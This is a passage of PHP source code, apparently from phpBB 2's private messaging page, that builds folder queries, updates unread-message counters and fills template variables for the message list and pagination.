$lang['Disable_Smilies_pm'], 'L_ATTACH_SIGNATURE' => $lang['Attach_signature'], 'L_BBCODE_B_HELP' => $lang['bbcode_b_help'], 'L_BBCODE_I_HELP' => $lang['bbcode_i_help'], 'L_BBCODE_U_HELP' => $lang['bbcode_u_help'], 'L_BBCODE_Q_HELP' => $lang['bbcode_q_help'], 'L_BBCODE_C_HELP' => $lang['bbcode_c_help'], 'L_BBCODE_L_HELP' => $lang['bbcode_l_help'], 'L_BBCODE_O_HELP' => $lang['bbcode_o_help'], 'L_BBCODE_P_HELP' => $lang['bbcode_p_help'], 'L_BBCODE_W_HELP' => $lang['bbcode_w_help'], 'L_BBCODE_A_HELP' => $lang['bbcode_a_help'], 'L_BBCODE_S_HELP' => $lang['bbcode_s_help'], 'L_BBCODE_F_HELP' => $lang['bbcode_f_help'], 'L_EMPTY_MESSAGE' => $lang['Empty_message'], 'L_FONT_COLOR' => $lang['Font_color'], 'L_COLOR_DEFAULT' => $lang['color_default'], 'L_COLOR_DARK_RED' => $lang['color_dark_red'], 'L_COLOR_RED' => $lang['color_red'], 'L_COLOR_ORANGE' => $lang['color_orange'], 'L_COLOR_BROWN' => $lang['color_brown'], 'L_COLOR_YELLOW' => $lang['color_yellow'], 'L_COLOR_GREEN' => $lang['color_green'], 'L_COLOR_OLIVE' => $lang['color_olive'], 'L_COLOR_CYAN' => $lang['color_cyan'], 'L_COLOR_BLUE' => $lang['color_blue'], 'L_COLOR_DARK_BLUE' => $lang['color_dark_blue'], 'L_COLOR_INDIGO' => $lang['color_indigo'], 'L_COLOR_VIOLET' => $lang['color_violet'], 'L_COLOR_WHITE' => $lang['color_white'], 'L_COLOR_BLACK' => $lang['color_black'], 'L_FONT_SIZE' => $lang['Font_size'], 'L_FONT_TINY' => $lang['font_tiny'], 'L_FONT_SMALL' => $lang['font_small'], 'L_FONT_NORMAL' => $lang['font_normal'], 'L_FONT_LARGE' => $lang['font_large'], 'L_FONT_HUGE' => $lang['font_huge'], 'L_BBCODE_CLOSE_TAGS' => $lang['Close_Tags'], 'L_STYLES_TIP' => $lang['Styles_tip'], 'S_HTML_CHECKED' => ( !$html_on ) ? ' checked="checked"' : '', 'S_BBCODE_CHECKED' => ( !$bbcode_on ) ? ' checked="checked"' : '', 'S_SMILIES_CHECKED' => ( !$smilies_on ) ? ' checked="checked"' : '', 'S_SIGNATURE_CHECKED' => ( $attach_sig ) ? ' checked="checked"' : '', 'S_HIDDEN_FORM_FIELDS' => $s_hidden_fields, 'S_POST_ACTION' => append_sid("privmsg.$phpEx"), 'U_SEARCH_USER' => append_sid("search.$phpEx?mode=searchuser"), 'U_VIEW_FORUM' => append_sid("privmsg.$phpEx")) ); $template->pparse('body'); include($phpbb_root_path . 'includes/page_tail.'.$phpEx); } // // Default page // if ( !$userdata['session_logged_in'] ) { redirect(append_sid("login.$phpEx?redirect=privmsg.$phpEx&folder=inbox", true)); } // // Update unread status // $sql = "UPDATE " . USERS_TABLE . " SET user_unread_privmsg = user_unread_privmsg + user_new_privmsg, user_new_privmsg = 0, user_last_privmsg = " . $userdata['session_start'] . " WHERE user_id = " . $userdata['user_id']; if ( !$db->sql_query($sql) ) { message_die(GENERAL_ERROR, 'Could not update private message new/read status for user', '', __LINE__, __FILE__, $sql); } $sql = "UPDATE " . PRIVMSGS_TABLE . " SET privmsgs_type = " . PRIVMSGS_UNREAD_MAIL . " WHERE privmsgs_type = " . PRIVMSGS_NEW_MAIL . " AND privmsgs_to_userid = " . $userdata['user_id']; if ( !$db->sql_query($sql) ) { message_die(GENERAL_ERROR, 'Could not update private message new/read status (2) for user', '', __LINE__, __FILE__, $sql); } // // Reset PM counters // $userdata['user_new_privmsg'] = 0; $userdata['user_unread_privmsg'] = ( $userdata['user_new_privmsg'] + $userdata['user_unread_privmsg'] ); // // Generate page // $page_title = $lang['Private_Messaging']; include($phpbb_root_path . 'includes/page_header.'.$phpEx); // // Load templates // $template->set_filenames(array( 'body' => 'privmsgs_body.tpl') ); make_jumpbox('viewforum.'.$phpEx); $orig_word = array(); $replacement_word = array(); obtain_word_list($orig_word, $replacement_word); // // New message // $post_new_mesg_url = '' . $lang['Send_a_new_message'] . ''; // // General SQL to obtain messages // $sql_tot = "SELECT COUNT(privmsgs_id) AS total FROM " . PRIVMSGS_TABLE . " "; $sql = "SELECT pm.privmsgs_type, pm.privmsgs_id, pm.privmsgs_date, pm.privmsgs_subject, u.user_id, u.username FROM " . PRIVMSGS_TABLE . " pm, " . USERS_TABLE . " u "; switch( $folder ) { case 'inbox': $sql_tot .= "WHERE privmsgs_to_userid = " . $userdata['user_id'] . " AND ( privmsgs_type = " . PRIVMSGS_NEW_MAIL . " OR privmsgs_type = " . PRIVMSGS_READ_MAIL . " OR privmsgs_type = " . PRIVMSGS_UNREAD_MAIL . " )"; $sql .= "WHERE pm.privmsgs_to_userid = " . $userdata['user_id'] . " AND u.user_id = pm.privmsgs_from_userid AND ( pm.privmsgs_type = " . PRIVMSGS_NEW_MAIL . " OR pm.privmsgs_type = " . PRIVMSGS_READ_MAIL . " OR privmsgs_type = " . PRIVMSGS_UNREAD_MAIL . " )"; break; case 'outbox': $sql_tot .= "WHERE privmsgs_from_userid = " . $userdata['user_id'] . " AND ( privmsgs_type = " . PRIVMSGS_NEW_MAIL . " OR privmsgs_type = " . PRIVMSGS_UNREAD_MAIL . " )"; $sql .= "WHERE pm.privmsgs_from_userid = " . $userdata['user_id'] . " AND u.user_id = pm.privmsgs_to_userid AND ( pm.privmsgs_type = " . PRIVMSGS_NEW_MAIL . " OR privmsgs_type = " . PRIVMSGS_UNREAD_MAIL . " )"; break; case 'sentbox': $sql_tot .= "WHERE privmsgs_from_userid = " . $userdata['user_id'] . " AND privmsgs_type = " . PRIVMSGS_SENT_MAIL; $sql .= "WHERE pm.privmsgs_from_userid = " . $userdata['user_id'] . " AND u.user_id = pm.privmsgs_to_userid AND pm.privmsgs_type = " . PRIVMSGS_SENT_MAIL; break; case 'savebox': $sql_tot .= "WHERE ( ( privmsgs_to_userid = " . $userdata['user_id'] . " AND privmsgs_type = " . PRIVMSGS_SAVED_IN_MAIL . " ) OR ( privmsgs_from_userid = " . $userdata['user_id'] . " AND privmsgs_type = " . PRIVMSGS_SAVED_OUT_MAIL . ") )"; $sql .= "WHERE u.user_id = pm.privmsgs_from_userid AND ( ( pm.privmsgs_to_userid = " . $userdata['user_id'] . " AND pm.privmsgs_type = " . PRIVMSGS_SAVED_IN_MAIL . " ) OR ( pm.privmsgs_from_userid = " . $userdata['user_id'] . " AND pm.privmsgs_type = " . PRIVMSGS_SAVED_OUT_MAIL . " ) )"; break; default: message_die(GENERAL_MESSAGE, $lang['No_such_folder']); break; } // // Show messages over previous x days/months // if ( $submit_msgdays && ( !empty($HTTP_POST_VARS['msgdays']) || !empty($HTTP_GET_VARS['msgdays']) ) ) { $msg_days = ( !empty($HTTP_POST_VARS['msgdays']) ) ? intval($HTTP_POST_VARS['msgdays']) : intval($HTTP_GET_VARS['msgdays']); $min_msg_time = time() - ($msg_days * 86400); $limit_msg_time_total = " AND privmsgs_date > $min_msg_time"; $limit_msg_time = " AND pm.privmsgs_date > $min_msg_time "; if ( !empty($HTTP_POST_VARS['msgdays']) ) { $start = 0; } } else { $limit_msg_time = $limit_msg_time_total = ''; $msg_days = 0; } $sql .= $limit_msg_time . " ORDER BY pm.privmsgs_date DESC LIMIT $start, " . $board_config['topics_per_page']; $sql_all_tot = $sql_tot; $sql_tot .= $limit_msg_time_total; // // Get messages // if ( !($result = $db->sql_query($sql_tot)) ) { message_die(GENERAL_ERROR, 'Could not query private message information', '', __LINE__, __FILE__, $sql_tot); } $pm_total = ( $row = $db->sql_fetchrow($result) ) ? $row['total'] : 0; if ( !($result = $db->sql_query($sql_all_tot)) ) { message_die(GENERAL_ERROR, 'Could not query private message information', '', __LINE__, __FILE__, $sql_tot); } $pm_all_total = ( $row = $db->sql_fetchrow($result) ) ? $row['total'] : 0; // // Build select box // $previous_days = array(0, 1, 7, 14, 30, 90, 180, 364); $previous_days_text = array($lang['All_Posts'], $lang['1_Day'], $lang['7_Days'], $lang['2_Weeks'], $lang['1_Month'], $lang['3_Months'], $lang['6_Months'], $lang['1_Year']); $select_msg_days = ''; for($i = 0; $i < count($previous_days); $i++) { $selected = ( $msg_days == $previous_days[$i] ) ? ' selected="selected"' : ''; $select_msg_days .= ''; } // // Define correct icons // switch ( $folder ) { case 'inbox': $l_box_name = $lang['Inbox']; break; case 'outbox': $l_box_name = $lang['Outbox']; break; case 'savebox': $l_box_name = $lang['Savebox']; break; case 'sentbox': $l_box_name = $lang['Sentbox']; break; } $post_pm = append_sid("privmsg.$phpEx?mode=post"); $post_pm_img = '' . $lang['Post_new_pm'] . ''; $post_pm = '' . $lang['Post_new_pm'] . ''; // // Output data for inbox status // if ( $folder != 'outbox' ) { $inbox_limit_pct = ( $board_config['max_' . $folder . '_privmsgs'] > 0 ) ? round(( $pm_all_total / $board_config['max_' . $folder . '_privmsgs'] ) * 100) : 100; $inbox_limit_img_length = ( $board_config['max_' . $folder . '_privmsgs'] > 0 ) ? round(( $pm_all_total / $board_config['max_' . $folder . '_privmsgs'] ) * $board_config['privmsg_graphic_length']) : $board_config['privmsg_graphic_length']; $inbox_limit_remain = ( $board_config['max_' . $folder . '_privmsgs'] > 0 ) ? $board_config['max_' . $folder . '_privmsgs'] - $pm_all_total : 0; $template->assign_block_vars('switch_box_size_notice', array()); switch( $folder ) { case 'inbox': $l_box_size_status = sprintf($lang['Inbox_size'], $inbox_limit_pct); break; case 'sentbox': $l_box_size_status = sprintf($lang['Sentbox_size'], $inbox_limit_pct); break; case 'savebox': $l_box_size_status = sprintf($lang['Savebox_size'], $inbox_limit_pct); break; default: $l_box_size_status = ''; break; } } else { $inbox_limit_img_length = $inbox_limit_pct = $l_box_size_status = ''; } // // Dump vars to template // $template->assign_vars(array( 'BOX_NAME' => $l_box_name, 'INBOX_IMG' => $inbox_img, 'SENTBOX_IMG' => $sentbox_img, 'OUTBOX_IMG' => $outbox_img, 'SAVEBOX_IMG' => $savebox_img, 'INBOX' => $inbox_url, 'SENTBOX' => $sentbox_url, 'OUTBOX' => $outbox_url, 'SAVEBOX' => $savebox_url, 'POST_PM_IMG' => $post_pm_img, 'POST_PM' => $post_pm, 'INBOX_LIMIT_IMG_WIDTH' => $inbox_limit_img_length, 'INBOX_LIMIT_PERCENT' => $inbox_limit_pct, 'BOX_SIZE_STATUS' => $l_box_size_status, 'L_INBOX' => $lang['Inbox'], 'L_OUTBOX' => $lang['Outbox'], 'L_SENTBOX' => $lang['Sent'], 'L_SAVEBOX' => $lang['Saved'], 'L_MARK' => $lang['Mark'], 'L_FLAG' => $lang['Flag'], 'L_SUBJECT' => $lang['Subject'], 'L_DATE' => $lang['Date'], 'L_DISPLAY_MESSAGES' => $lang['Display_messages'], 'L_FROM_OR_TO' => ( $folder == 'inbox' || $folder == 'savebox' ) ? $lang['From'] : $lang['To'], 'L_MARK_ALL' => $lang['Mark_all'], 'L_UNMARK_ALL' => $lang['Unmark_all'], 'L_DELETE_MARKED' => $lang['Delete_marked'], 'L_DELETE_ALL' => $lang['Delete_all'], 'L_SAVE_MARKED' => $lang['Save_marked'], 'S_PRIVMSGS_ACTION' => append_sid("privmsg.$phpEx?folder=$folder"), 'S_HIDDEN_FIELDS' => '', 'S_POST_NEW_MSG' => $post_new_mesg_url, 'S_SELECT_MSG_DAYS' => $select_msg_days, 'U_POST_NEW_TOPIC' => append_sid("privmsg.$phpEx?mode=post")) ); // // Okay, let's build the correct folder // if ( !($result = $db->sql_query($sql)) ) { message_die(GENERAL_ERROR, 'Could not query private messages', '', __LINE__, __FILE__, $sql); } if ( $row = $db->sql_fetchrow($result) ) { $i = 0; do { $privmsg_id = $row['privmsgs_id']; $flag = $row['privmsgs_type']; $icon_flag = ( $flag == PRIVMSGS_NEW_MAIL || $flag == PRIVMSGS_UNREAD_MAIL ) ? $images['pm_unreadmsg'] : $images['pm_readmsg']; $icon_flag_alt = ( $flag == PRIVMSGS_NEW_MAIL || $flag == PRIVMSGS_UNREAD_MAIL ) ? $lang['Unread_message'] : $lang['Read_message']; $msg_userid = $row['user_id']; $msg_username = $row['username']; $u_from_user_profile = append_sid("profile.$phpEx?mode=viewprofile&" . POST_USERS_URL . "=$msg_userid"); $msg_subject = $row['privmsgs_subject']; if ( count($orig_word) ) { $msg_subject = preg_replace($orig_word, $replacement_word, $msg_subject); } $u_subject = append_sid("privmsg.$phpEx?folder=$folder&mode=read&" . POST_POST_URL . "=$privmsg_id"); $msg_date = create_date($board_config['default_dateformat'], $row['privmsgs_date'], $board_config['board_timezone']); if ( $flag == PRIVMSGS_NEW_MAIL && $folder == 'inbox' ) { $msg_subject = '' . $msg_subject . ''; $msg_date = '' . $msg_date . ''; $msg_username = '' . $msg_username . ''; } $row_color = ( !($i % 2) ) ? $theme['td_color1'] : $theme['td_color2']; $row_class = ( !($i % 2) ) ? $theme['td_class1'] : $theme['td_class2']; $i++; $template->assign_block_vars('listrow', array( 'ROW_COLOR' => '#' . $row_color, 'ROW_CLASS' => $row_class, 'FROM' => $msg_username, 'SUBJECT' => $msg_subject, 'DATE' => $msg_date, 'PRIVMSG_FOLDER_IMG' => $icon_flag, 'L_PRIVMSG_FOLDER_ALT' => $icon_flag_alt, 'S_MARK_ID' => $privmsg_id, 'U_READ' => $u_subject, 'U_FROM_USER_PROFILE' => $u_from_user_profile) ); } while( $row = $db->sql_fetchrow($result) ); $template->assign_vars(array( 'PAGINATION' => generate_pagination("privmsg.$phpEx?folder=$folder", $pm_total, $board_config['topics_per_page'], $start), 'PAGE_NUMBER' => sprintf($lang['Page_of'], ( floor( $start / $board_config['topics_per_page'] ) + 1 ), ceil( $pm_total / $board_config['topics_per_page'] )), 'L_GOTO_PAGE' => $lang['Goto_page']) ); } else { $template->assign_vars(array( 'L_NO_MESSAGES' => $lang['No_messages_folder']) ); $template->assign_block_vars("switch_no_messages", array() ); } $template->pparse('body'); include($phpbb_root_path . 'includes/page_tail.'.$phpEx); ?>